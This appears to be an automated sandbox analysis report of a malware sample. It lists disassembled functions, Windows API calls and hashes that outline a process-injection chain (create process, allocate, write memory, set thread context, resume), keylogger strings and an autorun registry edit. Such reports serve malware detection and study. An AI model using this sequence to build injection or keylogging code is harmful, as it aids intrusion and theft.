                                                                                                                                                • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                                                                • Opcode Fuzzy Hash: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                                                                                                                                • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                                                                Function 004555CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ___initconout.LIBCMT ref: 004555DB
                                                                                                                                                  • Part of subcall function 00456B9D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004555E0,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000), ref: 00456BB0
                                                                                                                                                • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB99,?), ref: 004555FE
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ConsoleCreateFileWrite___initconout
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 3087715906-263838557
                                                                                                                                                • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                                                                                                                • Instruction ID: 53f4b2898eb153bde3bf118a85e4039abf363423ff24ad7888d91dc13aa78fd6
                                                                                                                                                • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                                                                                                                • Instruction Fuzzy Hash: C5E0EDB0100548BBDA208B69DC29EBA3328EB00331F500369FE29C62D2EB34EC44C769
                                                                                                                                                Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: State
                                                                                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                • API String ID: 1649606143-2446555240
                                                                                                                                                • Opcode ID: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                                                                                                                • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                                                                • Opcode Fuzzy Hash: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                                                                                                                • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                                                                Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Init_thread_footer__onexit
                                                                                                                                                • String ID: ,kG$0kG
                                                                                                                                                • API String ID: 1881088180-2015055088
                                                                                                                                                • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                                                                                                • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                                                                                • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                                                                                                • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                                                                                Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D509,00000000,?,00000000), ref: 00413A6C
                                                                                                                                                • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A80
                                                                                                                                                Strings
                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DeleteOpenValue
                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                • API String ID: 2654517830-1051519024
                                                                                                                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                                                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                                                                                Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                                                                                • GetLastError.KERNEL32 ref: 00440D85
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1717984340-0
                                                                                                                                                • Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                                                                                                                • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                                                                                • Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                                                                                                                • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                                                                                Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                                                                                                                                • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4100373531-0
                                                                                                                                                • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                                • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                                                                • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                                • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:11.6%
                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                Signature Coverage:0%
                                                                                                                                                Total number of Nodes:178
                                                                                                                                                Total number of Limit Nodes:9
                                                                                                                                                execution_graph 34874 d0d710 DuplicateHandle 34875 d0d7a6 34874->34875 34880 d0d0c0 34881 d0d106 GetCurrentProcess 34880->34881 34883 d0d151 34881->34883 34884 d0d158 GetCurrentThread 34881->34884 34883->34884 34885 d0d195 GetCurrentProcess 34884->34885 34886 d0d18e 34884->34886 34887 d0d1cb 34885->34887 34886->34885 34888 d0d1f3 GetCurrentThreadId 34887->34888 34889 d0d224 34888->34889 34901 d0ad30 34904 d0ae28 34901->34904 34902 d0ad3f 34905 d0ae39 34904->34905 34906 d0ae5c 34904->34906 34905->34906 34907 d0b060 GetModuleHandleW 34905->34907 34906->34902 34908 d0b08d 34907->34908 34908->34902 34876 6c47bc0 34877 6c47c03 34876->34877 34878 6c47c21 MonitorFromPoint 34877->34878 34879 6c47c52 34877->34879 34878->34879 34909 6dd807b 34910 6dd8081 34909->34910 34915 6dd9a09 34910->34915 34932 6dd9a76 34910->34932 34950 6dd9a18 34910->34950 34911 6dd808c 34916 6dd9a18 34915->34916 34917 6dd9a56 34916->34917 34967 6dda1dd 34916->34967 34971 6dda4a3 34916->34971 34976 6dda083 34916->34976 34981 6dd9e67 34916->34981 34985 6dda0e5 34916->34985 34990 6dd9f05 34916->34990 34995 6dda025 34916->34995 35000 6dda50a 34916->35000 35005 6dda00b 34916->35005 35010 6dda6ef 34916->35010 35015 6dd9fd0 34916->35015 35020 6dd9f9a 34916->35020 35024 6dda4bb 34916->35024 35028 6dda379 34916->35028 34917->34911 34933 6dd9a04 34932->34933 34935 6dd9a79 34932->34935 34934 6dd9a06 34933->34934 34936 6dda1dd 2 API calls 34933->34936 34937 6dda379 2 API calls 34933->34937 34938 6dda4bb 2 API calls 34933->34938 34939 6dd9f9a 2 API calls 34933->34939 34940 6dd9fd0 2 API calls 34933->34940 34941 6dda6ef 2 API calls 34933->34941 34942 6dda00b 2 API calls 34933->34942 34943 6dda50a 2 API calls 34933->34943 34944 6dda025 2 API calls 34933->34944 34945 6dd9f05 2 API calls 34933->34945 34946 6dda0e5 2 API calls 34933->34946 34947 6dd9e67 2 API calls 34933->34947 34948 6dda083 2 API calls 34933->34948 34949 6dda4a3 2 API calls 34933->34949 34934->34911 34935->34911 34936->34934 34937->34934 34938->34934 34939->34934 34940->34934 34941->34934 34942->34934 34943->34934 34944->34934 34945->34934 34946->34934 34947->34934 34948->34934 34949->34934 34951 6dd9a32 34950->34951 34952 6dd9a56 34951->34952 34953 6dda1dd 2 API calls 34951->34953 34954 6dda379 2 API calls 34951->34954 34955 6dda4bb 2 API calls 34951->34955 34956 6dd9f9a 2 API calls 34951->34956 34957 6dd9fd0 2 API calls 34951->34957 34958 6dda6ef 2 API calls 34951->34958 34959 6dda00b 2 API calls 34951->34959 34960 6dda50a 2 API calls 34951->34960 34961 6dda025 2 API calls 34951->34961 34962 6dd9f05 2 API calls 34951->34962 34963 6dda0e5 2 API calls 34951->34963 34964 6dd9e67 2 API calls 34951->34964 34965 6dda083 2 API calls 34951->34965 34966 6dda4a3 2 API calls 34951->34966 34952->34911 34953->34952 34954->34952 34955->34952 34956->34952 34957->34952 34958->34952 34959->34952 34960->34952 34961->34952 34962->34952 34963->34952 34964->34952 34965->34952 34966->34952 35035 6dd7199 34967->35035 35039 6dd71a0 34967->35039 34968 6dda201 34972 6dda37d 34971->34972 34972->34971 34973 6dda4b7 34972->34973 35043 6dd7008 34972->35043 35047 6dd7001 34972->35047 34977 6dda03c 34976->34977 34978 6dda05d 34977->34978 34979 6dd7199 WriteProcessMemory 34977->34979 34980 6dd71a0 WriteProcessMemory 34977->34980 34978->34917 34979->34978 34980->34978 35051 6dd7859 34981->35051 35055 6dd7860 34981->35055 34986 6dda0eb 34985->34986 35059 6dd6f58 34986->35059 35063 6dd6f51 34986->35063 34987 6dda118 34987->34917 34991 6dd9f1a 34990->34991 34992 6dd9ecd 34991->34992 34993 6dd6f58 ResumeThread 34991->34993 34994 6dd6f51 ResumeThread 34991->34994 34992->34917 34993->34992 34994->34992 34996 6dda02b 34995->34996 34998 6dd7199 WriteProcessMemory 34996->34998 34999 6dd71a0 WriteProcessMemory 34996->34999 34997 6dda05d 34997->34917 34998->34997 34999->34997 35003 6dd7199 WriteProcessMemory 35000->35003 35004 6dd71a0 WriteProcessMemory 35000->35004 35001 6dda23d 35001->35000 35002 6dda64d 35001->35002 35002->34917 35003->35001 35004->35001 35006 6dda011 35005->35006 35067 6dd7288 35006->35067 35071 6dd7290 35006->35071 35007 6dda718 35011 6dda6f5 35010->35011 35012 6dda718 35011->35012 35013 6dd7288 ReadProcessMemory 35011->35013 35014 6dd7290 ReadProcessMemory 35011->35014 35013->35012 35014->35012 35016 6dd9fdd 35015->35016 35018 6dd7288 ReadProcessMemory 35016->35018 35019 6dd7290 ReadProcessMemory 35016->35019 35017 6dda718 35018->35017 35019->35017 35075 6dd70d9 35020->35075 35079 6dd70e0 35020->35079 35021 6dd9fbb 35026 6dd7008 Wow64SetThreadContext 35024->35026 35027 6dd7001 Wow64SetThreadContext 35024->35027 35025 6dda4d5 35026->35025 35027->35025 35029 6dda37d 35028->35029 35033 6dd7008 Wow64SetThreadContext 35028->35033 35034 6dd7001 Wow64SetThreadContext 35028->35034 35030 6dda4b7 35029->35030 35031 6dd7008 Wow64SetThreadContext 35029->35031 35032 6dd7001 Wow64SetThreadContext 35029->35032 35031->35029 35032->35029 35033->35029 35034->35029 35036 6dd71a0 WriteProcessMemory 35035->35036 35038 6dd723f 35036->35038 35038->34968 35040 6dd71e8 WriteProcessMemory 35039->35040 35042 6dd723f 35040->35042 35042->34968 35044 6dd704d Wow64SetThreadContext 35043->35044 35046 6dd7095 35044->35046 35046->34972 35048 6dd7008 Wow64SetThreadContext 35047->35048 35050 6dd7095 35048->35050 35050->34972 35052 6dd7860 CreateProcessA 35051->35052 35054 6dd7aab 35052->35054 35054->35054 35056 6dd78e9 CreateProcessA 35055->35056 35058 6dd7aab 35056->35058 35058->35058 35060 6dd6f98 ResumeThread 35059->35060 35062 6dd6fc9 35060->35062 35062->34987 35064 6dd6f58 ResumeThread 35063->35064 35066 6dd6fc9 35064->35066 35066->34987 35068 6dd7290 ReadProcessMemory 35067->35068 35070 6dd731f 35068->35070 35070->35007 35072 6dd72db ReadProcessMemory 35071->35072 35074 6dd731f 35072->35074 35074->35007 35076 6dd70e0 VirtualAllocEx 35075->35076 35078 6dd715d 35076->35078 35078->35021 35080 6dd7120 VirtualAllocEx 35079->35080 35082 6dd715d 35080->35082 35082->35021 35083 d04668 35084 d0467a 35083->35084 35085 d04686 35084->35085 35087 d04779 35084->35087 35088 d0477c 35087->35088 35092 d04888 35088->35092 35096 d04878 35088->35096 35094 d048af 35092->35094 35093 d0498c 35093->35093 35094->35093 35100 d044b0 35094->35100 35097 d0487c 35096->35097 35098 d0498c 35097->35098 35099 d044b0 CreateActCtxA 35097->35099 35098->35098 35099->35098 35101 d05918 CreateActCtxA 35100->35101 35103 d059db 35101->35103 34890 6c43f98 34891 6c43fe6 DrawTextExW 34890->34891 34893 6c4403e 34891->34893 34894 6ddac40 34895 6ddadcb 34894->34895 34897 6ddac66 34894->34897 34897->34895 34898 6dd5470 34897->34898 34899 6ddaec0 PostMessageW 34898->34899 34900 6ddaf2c 34899->34900 34900->34897

                                                                                                                                                Executed Functions

                                                                                                                                                Function 00D0D0B1 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 467 d0d0b1-d0d14f GetCurrentProcess 471 d0d151-d0d157 467->471 472 d0d158-d0d18c GetCurrentThread 467->472 471->472 473 d0d195-d0d1c9 GetCurrentProcess 472->473 474 d0d18e-d0d194 472->474 476 d0d1d2-d0d1ed call d0d699 473->476 477 d0d1cb-d0d1d1 473->477 474->473 480 d0d1f3-d0d222 GetCurrentThreadId 476->480 477->476 481 d0d224-d0d22a 480->481 482 d0d22b-d0d28d 480->482 481->482
                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00D0D13E
                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00D0D17B
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00D0D1B8
                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00D0D211
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                • Opcode ID: 7fcfe88d6afa215f3fd074126bef6be482aa88aaf0325547bc894a4d30f00774
                                                                                                                                                • Instruction ID: 8180f06b74eeffd3c72f80d4890e0062fc7cd515402272b3524ed03d7c5b04eb
                                                                                                                                                • Opcode Fuzzy Hash: 7fcfe88d6afa215f3fd074126bef6be482aa88aaf0325547bc894a4d30f00774
                                                                                                                                                • Instruction Fuzzy Hash: 7C5145B0900309DFDB14CFA9D548BDEBBF1AF48314F24C46AE419A73A0DB749984CB66
                                                                                                                                                Function 00D0D0C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 489 d0d0c0-d0d14f GetCurrentProcess 493 d0d151-d0d157 489->493 494 d0d158-d0d18c GetCurrentThread 489->494 493->494 495 d0d195-d0d1c9 GetCurrentProcess 494->495 496 d0d18e-d0d194 494->496 498 d0d1d2-d0d1ed call d0d699 495->498 499 d0d1cb-d0d1d1 495->499 496->495 502 d0d1f3-d0d222 GetCurrentThreadId 498->502 499->498 503 d0d224-d0d22a 502->503 504 d0d22b-d0d28d 502->504 503->504
                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00D0D13E
                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00D0D17B
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00D0D1B8
                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00D0D211
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                • Opcode ID: 616519ff370f3e9ebb5f2157f89b65304f4a49d3896008c9120e3cd08e85b91d
                                                                                                                                                • Instruction ID: 594e04292d47af4884a601ce5858eb50e2ffaa26db9ea77f060fa44548c61b8d
                                                                                                                                                • Opcode Fuzzy Hash: 616519ff370f3e9ebb5f2157f89b65304f4a49d3896008c9120e3cd08e85b91d
                                                                                                                                                • Instruction Fuzzy Hash: C15116B09003099FDB14DFAAD548B9EBBF1AB48314F24845AE419A73A0DB749984CB65
                                                                                                                                                Function 06DD7859 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 621 6dd7859-6dd78f5 624 6dd792e-6dd794e 621->624 625 6dd78f7-6dd7901 621->625 630 6dd7987-6dd79b6 624->630 631 6dd7950-6dd795a 624->631 625->624 626 6dd7903-6dd7905 625->626 628 6dd7928-6dd792b 626->628 629 6dd7907-6dd7911 626->629 628->624 632 6dd7915-6dd7924 629->632 633 6dd7913 629->633 641 6dd79ef-6dd7aa9 CreateProcessA 630->641 642 6dd79b8-6dd79c2 630->642 631->630 634 6dd795c-6dd795e 631->634 632->632 635 6dd7926 632->635 633->632 636 6dd7981-6dd7984 634->636 637 6dd7960-6dd796a 634->637 635->628 636->630 639 6dd796c 637->639 640 6dd796e-6dd797d 637->640 639->640 640->640 643 6dd797f 640->643 653 6dd7aab-6dd7ab1 641->653 654 6dd7ab2-6dd7b38 641->654 642->641 644 6dd79c4-6dd79c6 642->644 643->636 646 6dd79e9-6dd79ec 644->646 647 6dd79c8-6dd79d2 644->647 646->641 648 6dd79d4 647->648 649 6dd79d6-6dd79e5 647->649 648->649 649->649 650 6dd79e7 649->650 650->646 653->654 664 6dd7b48-6dd7b4c 654->664 665 6dd7b3a-6dd7b3e 654->665 667 6dd7b5c-6dd7b60 664->667 668 6dd7b4e-6dd7b52 664->668 665->664 666 6dd7b40 665->666 666->664 670 6dd7b70-6dd7b74 667->670 671 6dd7b62-6dd7b66 667->671 668->667 669 6dd7b54 668->669 669->667 673 6dd7b86-6dd7b8d 670->673 674 6dd7b76-6dd7b7c 670->674 671->670 672 6dd7b68 671->672 672->670 675 6dd7b8f-6dd7b9e 673->675 676 6dd7ba4 673->676 674->673 675->676 678 6dd7ba5 676->678 678->678
                                                                                                                                                APIs
                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DD7A96
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                • Opcode ID: 24232fcf87e39b462190832860abd24f5cd789c55d2259664d08a11229b97fa1
                                                                                                                                                • Instruction ID: 9ab5f849481545d2d74f0c79496e7b2b701a451fa5ddfba9623410abc0783cc8
                                                                                                                                                • Opcode Fuzzy Hash: 24232fcf87e39b462190832860abd24f5cd789c55d2259664d08a11229b97fa1
                                                                                                                                                • Instruction Fuzzy Hash: 8BA17E71D00219DFDB60DFA8C841BDDBBB2FF48314F1485AAE848A7290DB749985CF91
                                                                                                                                                Function 06DD7860 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 679 6dd7860-6dd78f5 681 6dd792e-6dd794e 679->681 682 6dd78f7-6dd7901 679->682 687 6dd7987-6dd79b6 681->687 688 6dd7950-6dd795a 681->688 682->681 683 6dd7903-6dd7905 682->683 685 6dd7928-6dd792b 683->685 686 6dd7907-6dd7911 683->686 685->681 689 6dd7915-6dd7924 686->689 690 6dd7913 686->690 698 6dd79ef-6dd7aa9 CreateProcessA 687->698 699 6dd79b8-6dd79c2 687->699 688->687 691 6dd795c-6dd795e 688->691 689->689 692 6dd7926 689->692 690->689 693 6dd7981-6dd7984 691->693 694 6dd7960-6dd796a 691->694 692->685 693->687 696 6dd796c 694->696 697 6dd796e-6dd797d 694->697 696->697 697->697 700 6dd797f 697->700 710 6dd7aab-6dd7ab1 698->710 711 6dd7ab2-6dd7b38 698->711 699->698 701 6dd79c4-6dd79c6 699->701 700->693 703 6dd79e9-6dd79ec 701->703 704 6dd79c8-6dd79d2 701->704 703->698 705 6dd79d4 704->705 706 6dd79d6-6dd79e5 704->706 705->706 706->706 707 6dd79e7 706->707 707->703 710->711 721 6dd7b48-6dd7b4c 711->721 722 6dd7b3a-6dd7b3e 711->722 724 6dd7b5c-6dd7b60 721->724 725 6dd7b4e-6dd7b52 721->725 722->721 723 6dd7b40 722->723 723->721 727 6dd7b70-6dd7b74 724->727 728 6dd7b62-6dd7b66 724->728 725->724 726 6dd7b54 725->726 726->724 730 6dd7b86-6dd7b8d 727->730 731 6dd7b76-6dd7b7c 727->731 728->727 729 6dd7b68 728->729 729->727 732 6dd7b8f-6dd7b9e 730->732 733 6dd7ba4 730->733 731->730 732->733 735 6dd7ba5 733->735 735->735
                                                                                                                                                APIs
                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DD7A96
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                • Opcode ID: 4b5bd88ae943ac426c40efd92a8789d7e1434094c1aef686df0682b3389397b5
                                                                                                                                                • Instruction ID: 7126d2c7ee1efdbb5edd7ecaaf5212c467bf5b14c8e8902f36439a7fc7a90112
                                                                                                                                                • Opcode Fuzzy Hash: 4b5bd88ae943ac426c40efd92a8789d7e1434094c1aef686df0682b3389397b5
                                                                                                                                                • Instruction Fuzzy Hash: C6917E71D00219DFDB50DFA8C841BEDBBB2FF48314F1485AAE848A7290DB749985CF91
                                                                                                                                                Function 00D0AE28 Relevance: 1.7, APIs: 1, Instructions: 207COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 736 d0ae28-d0ae37 737 d0ae63-d0ae67 736->737 738 d0ae39-d0ae46 call d0a14c 736->738 739 d0ae69-d0ae73 737->739 740 d0ae7b-d0aebc 737->740 743 d0ae48 738->743 744 d0ae5c 738->744 739->740 747 d0aec9-d0aed7 740->747 748 d0aebe-d0aec6 740->748 796 d0ae4e call d0b0c0 743->796 797 d0ae4e call d0b0b0 743->797 744->737 750 d0aed9-d0aede 747->750 751 d0aefb-d0aefd 747->751 748->747 749 d0ae54-d0ae56 749->744 752 d0af98-d0afaf 749->752 754 d0aee0-d0aee7 call d0a158 750->754 755 d0aee9 750->755 753 d0af00-d0af07 751->753 769 d0afb1-d0b010 752->769 758 d0af14-d0af1b 753->758 759 d0af09-d0af11 753->759 757 d0aeeb-d0aef9 754->757 755->757 757->753 761 d0af28-d0af31 call d0a168 758->761 762 d0af1d-d0af25 758->762 759->758 767 d0af33-d0af3b 761->767 768 d0af3e-d0af43 761->768 762->761 767->768 770 d0af61-d0af6e 768->770 771 d0af45-d0af4c 768->771 787 d0b012 769->787 778 d0af70-d0af8e 770->778 779 d0af91-d0af97 770->779 771->770 773 d0af4e-d0af5e call d0a178 call d0a188 771->773 773->770 778->779 788 d0b014 787->788 789 d0b016-d0b03e 787->789 788->789 790 d0b040-d0b058 788->790 789->790 791 d0b060-d0b08b GetModuleHandleW 790->791 792 d0b05a-d0b05d 790->792 793 d0b094-d0b0a8 791->793 794 d0b08d-d0b093 791->794 792->791 794->793 796->749 797->749
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B07E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4139908857-0
